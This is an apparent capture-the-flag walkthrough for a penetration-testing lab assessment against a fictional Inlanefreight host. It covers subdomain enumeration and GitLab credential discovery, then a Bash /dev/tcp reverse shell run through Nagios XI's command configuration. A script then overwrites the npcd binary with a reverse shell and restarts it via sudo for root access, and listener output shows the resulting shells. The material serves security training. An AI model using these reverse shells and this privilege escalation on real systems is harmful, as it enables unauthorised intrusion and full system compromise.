Attacking Common Applications - Skills Assessment II
During an external penetration test for the company Inlanefreight, you come across a host that, at first glance, does not seem extremely interesting. At this point in the assessment, you have exhausted all options and hit several dead ends. Looking back through your enumeration notes, something catches your eye about this particular host. You also see a note that you don't recall about the gitlab.inlanefreight.local vhost.
Performing deeper and iterative enumeration reveals several serious flaws. Enumerate the target carefully and answer all the questions below to complete the second part of the skills assessment.
What is the URL of the WordPress instance?
There are two ways to find it: fuzz subdomain names with ffuf, or simply pull the landing page with curl and grep for hostnames. The page source (browser developer tools) shows the same links. Note that the ffuf form below substitutes FUZZ into the hostname, so it only hits names that actually resolve (for example, names already in /etc/hosts); to brute-force virtual hosts against the IP itself, point -u at http://10.129.201.90/ and send the candidate with -H 'Host: FUZZ.inlanefreight.local', then filter on response size with -fs.
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.local/
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://FUZZ.inlanefreight.local/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
blog [Status: 200, Size: 50114, Words: 16140, Lines: 1015, Duration: 212ms]
Using curl (the dot is escaped so the pattern matches a literal ".local" rather than any character followed by "local"):
curl -s http://10.129.201.90/ | grep '\.local'
<li><a href="http://blog.inlanefreight.local/">Employee Blog</a></li>
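As an added example that is not part of the original writeup, the shell functions below do the curl-and-grep step more carefully: they harvest every hostname under the target domain from an HTML body, deduplicate it, and emit the /etc/hosts line you need before the vhosts can be browsed. The sample page is constructed here; only the Employee Blog link comes from the curl output above, while the gitlab link and the CDN script tag are made up to show the filtering.

```bash
#!/bin/bash
# Added example: harvest vhost names for one domain from HTML and build the
# matching /etc/hosts entry. Not code from the original writeup.

# Constructed sample page: the Employee Blog link mirrors the curl output in
# the writeup; the other entries are made up to exercise the filtering.
SAMPLE_HTML='<html><body>
<li><a href="http://blog.inlanefreight.local/">Employee Blog</a></li>
<li><a href="https://GitLab.inlanefreight.local/explore">GitLab</a></li>
<li><a href="http://blog.inlanefreight.local/about/">About</a></li>
<script src="//cdn.example.com/app.local.js"></script>
</body></html>'

# extract_vhosts DOMAIN < html
# Prints each distinct hostname ending in DOMAIN, lower-cased, one per line.
# The domain is anchored in the regex, so "app.local.js" or an unrelated
# ".local" string elsewhere in the page is not picked up.
extract_vhosts() {
    local domain="$1" escaped
    escaped=$(printf '%s' "$domain" | sed 's/\./\\./g')   # literal dots in the regex
    grep -oiE "([a-z0-9-]+\.)*${escaped}" | tr 'A-Z' 'a-z' | sort -u
}

# hosts_line IP VHOST... : a single /etc/hosts line mapping every vhost to IP
hosts_line() {
    local ip="$1"
    shift
    printf '%s' "$ip"
    printf ' %s' "$@"
    printf '\n'
}

# vhosts_to_hosts_line IP DOMAIN < html : the two steps chained; returns 1
# when the page contains no hostname under DOMAIN
vhosts_to_hosts_line() {
    local ip="$1" domain="$2" names
    names=$(extract_vhosts "$domain")
    [ -n "$names" ] || return 1
    # word-splitting on the newline-separated names is intended here
    hosts_line "$ip" $names
}

# Demo against the constructed page. With a live target replace the printf
# with: curl -s http://10.129.201.90/ | vhosts_to_hosts_line 10.129.201.90 inlanefreight.local
printf '%s\n' "$SAMPLE_HTML" | vhosts_to_hosts_line 10.129.201.90 inlanefreight.local
```

The output line can be appended to /etc/hosts directly; re-run it after each new vhost you discover, since later questions in this assessment depend on a hostname that only appears inside the GitLab project.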
What is the name of the public GitLab project?
Browse the GitLab instance's /explore path; public projects are listed there.
What is the FQDN of the third vhost?
The FQDN appears in the contents of that public project (the one found via /explore).
What application is running on this third vhost? (One word)
Browse to the third vhost; the logo on its login page gives the application name.
What is the admin password to access this application?
Register an account on GitLab, then look through the repository; the admin password is stored in it.

Obtain reverse shell access on the target and submit the contents of the flag.txt file.
After logging in, open the Core Config Manager and create a Command whose command line is a Bash reverse shell:
bash -c 'bash -i >& /dev/tcp/10.10.16.78/4444 0>&1'
Then create a Service that uses that command and click Run Check Command (or Run). Before you click it, start an nc listener on the same port the reverse shell connects back to, otherwise the callback is lost.

Starting the listener:
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.78] from (UNKNOWN) [10.129.15.254] 57396
bash: cannot set terminal process group (5790): Inappropriate ioctl for device
bash: no job control in this shell
nagios@skills2:~$ ls
Now we need to escalate privileges to root. Start by checking what the nagios user is allowed to run through sudo:
nagios@skills2:/$ sudo -l
Matching Defaults entries for nagios on skills2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nagios may run the following commands on skills2:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
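Before relying on a privilege-escalation script, it helps to confirm the primitive it depends on. As an added example that is not part of the original writeup, these functions triage a sudo -l listing: they pull every absolute path off the NOPASSWD lines, report whether the current user can write each one, and scan a readable script for the absolute paths it invokes, which is where a writable daemon binary such as /usr/local/nagios/bin/npcd would show up. The embedded sample is a subset of the sudo -l output above; the path classification runs against whatever host you execute it on.

```bash
#!/bin/bash
# Added example, not from the original writeup: triage NOPASSWD sudo rules
# for targets the current user can tamper with.

# Constructed sample: a subset of the writeup's sudo -l output.
SAMPLE_SUDO='User nagios may run the following commands on skills2:
    (root) NOPASSWD: /etc/init.d/npcd start
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *'

# nopasswd_paths < sudo-l-output
# Every absolute path that appears on a NOPASSWD line (interpreter and
# script alike), deduplicated, one per line. Arguments such as "*" are dropped.
nopasswd_paths() {
    grep 'NOPASSWD:' | sed 's/.*NOPASSWD://' | tr -s ' \t' '\n' | grep '^/' | sort -u
}

# classify_path PATH : "missing", "writable" or "readonly" for the current user
classify_path() {
    if [ ! -e "$1" ]; then
        echo missing
    elif [ -w "$1" ]; then
        echo writable
    else
        echo readonly
    fi
}

# writable_targets < sudo-l-output : the NOPASSWD paths you can overwrite
writable_targets() {
    local p
    nopasswd_paths | while IFS= read -r p; do
        if [ "$(classify_path "$p")" = writable ]; then
            printf '%s\n' "$p"
        fi
    done
}

# referenced_paths SCRIPT : absolute paths mentioned inside a readable script,
# e.g. the daemon binary that a service-management wrapper starts as root
referenced_paths() {
    grep -IoE '(^|[^A-Za-z0-9_.-])/[A-Za-z0-9_./-]+' "$1" | sed 's/^[^/]*//' | sort -u
}

# writable_refs SCRIPT : those referenced paths that exist and are writable
writable_refs() {
    local p
    referenced_paths "$1" | while IFS= read -r p; do
        if [ "$(classify_path "$p")" = writable ]; then
            printf '%s\n' "$p"
        fi
    done
}

# Demo: classify the sample rules on this host, then look inside any readable
# script for writable paths it starts. On the target, use real output:
#   sudo -l | nopasswd_paths
printf '%s\n' "$SAMPLE_SUDO" | nopasswd_paths | while IFS= read -r p; do
    printf '%-60s %s\n' "$p" "$(classify_path "$p")"
    if [ -r "$p" ] && [ -f "$p" ]; then
        writable_refs "$p" | sed 's/^/    writable inside: /'
    fi
done
```

Anything reported as writable, either a NOPASSWD target itself or a path a NOPASSWD script execs, is a root-execution primitive; the npcd replacement used later in this writeup is exactly the second case.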
We can escalate through the Nagios service management: manage_services.sh runs as root via sudo and stops and starts npcd, whose binary lives at /usr/local/nagios/bin/npcd. If the nagios user can write that file (confirm with ls -l /usr/local/nagios/bin/npcd before going further), replacing it with a reverse shell and restarting the service hands us a root shell. I used the script below, but the same steps work just as well by hand.
#!/bin/bash
# Build a replacement "npcd" that is nothing but a Bash reverse shell.
# Adjust the IP and port to your own listener.
echo "#!/bin/bash" > /tmp/npcd
echo "bash -c 'bash -i >& /dev/tcp/10.10.16.78/4445 0>&1'" >> /tmp/npcd
chmod +x /tmp/npcd

# Stop npcd as root through the sudo-permitted management script
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd

# Keep a copy of the real daemon so it can be restored afterwards, then
# overwrite it. Fail loudly if the nagios user cannot write the binary,
# because the rest of the script is pointless in that case.
cp /usr/local/nagios/bin/npcd /tmp/npcd.orig
cp /tmp/npcd /usr/local/nagios/bin/npcd || { echo "[-] npcd is not writable, aborting"; exit 1; }

echo "[+] Start your listener now: nc -lvnp 4445"
sleep 15

# Starting the service as root executes our replacement, which calls back
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
sleep 5
echo "[+] Check your listener for the root shell"
Start the listener on the same port used in the script:
nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.16.78] from (UNKNOWN) [10.129.15.254] 37662
bash: cannot set terminal process group (7048): Inappropriate ioctl for device
bash: no job control in this shell
root@skills2:/# ls
To find the flag (the glob is quoted so the shell does not expand it against the current directory before find sees it):
find / -name '*flag*' 2>/dev/null | grep txt